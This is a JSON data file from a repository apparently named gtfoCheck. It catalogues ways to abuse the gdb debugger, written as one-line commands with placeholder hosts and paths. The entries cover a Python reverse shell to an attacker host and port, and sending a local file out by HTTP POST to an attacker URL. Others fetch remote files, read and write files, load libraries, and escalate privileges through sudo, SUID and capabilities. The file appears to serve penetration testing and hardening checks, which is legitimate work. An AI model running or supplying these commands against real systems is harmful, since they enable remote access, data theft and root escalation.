Graham
/
gtfoCheck
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
You cannot select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
master
Branches Tags
${ item.name }
Create tag ${ searchTerm }
Create branch ${ searchTerm }
from 'master'
${ noResults }
gtfoCheck/data/gdb.json

66 lines
2.9 KiB
JSON
Raw Permalink Blame History

{
"functions": {
"shell": [
{
"code": "gdb -nx -ex '!sh' -ex quit"
}
],
"reverse-shell": [
{
"description": "This requires that GDB is compiled with Python support. Run 'socat file:`tty`,raw,echo=0 tcp-listen:[port]' on the attacker box to receive the shell.",
"code": "gdb -nx -ex 'python import sys,socket,os,pty;s=socket.socket()\ns.connect((\"[host]\",[port]))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")' -ex quit\n"
}
],
"file-upload": [
{
"description": "This requires that GDB is compiled with Python support. Send local file via \"d\" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.",
"code": "gdb -nx -ex 'python import sys;\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(\"[url]\", bytes(u.urlencode({\"d\":open(\"[file]\",).read()}).encode()))' -ex quit\n"
},
{
"description": "This requires that GDB is compiled with Python support. Serve files in the local folder running an HTTP server.",
"code": "gdb -nx -ex 'python import sys;\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", [port]), s.SimpleHTTPRequestHandler).serve_forever()' -ex quit\n"
}
],
"file-download": [
{
"description": "This requires that GDB is compiled with Python support. Fetch a remote file via HTTP GET request.",
"code": "gdb -nx -ex 'python import sys;\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve(\"[url]\", \"[file]\",)' -ex quit\n"
}
],
"file-write": [
{
"description": "This requires that GDB is compiled with Python support.",
"code": "gdb -nx -ex \"dump value [file] \\\"DATA\\\"\" -ex quit\n"
}
],
"file-read": [
{
"description": "This requires that GDB is compiled with Python support.",
"code": "gdb -nx -ex 'python print(open(\"[file]\").read())' -ex quit"
}
],
"library-load": [
{
"description": "This requires that GDB is compiled with Python support.",
"code": "gdb -nx -ex 'python from ctypes import cdll; cdll.LoadLibrary(\"lib.so\")' -ex quit"
}
],
"suid": [
{
"description": "This requires that GDB is compiled with Python support.",
"code": "./gdb -nx -ex 'python import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")' -ex quit"
}
],
"sudo": [
{
"code": "sudo gdb -nx -ex '!sh' -ex quit"
}
],
"capabilities": [
{
"description": "This requires that GDB is compiled with Python support.",
"code": "./gdb -nx -ex 'python import os; os.setuid(0)' -ex '!sh' -ex quit"
}
]
}
}
Reference in New Issue View Git Blame Copy Permalink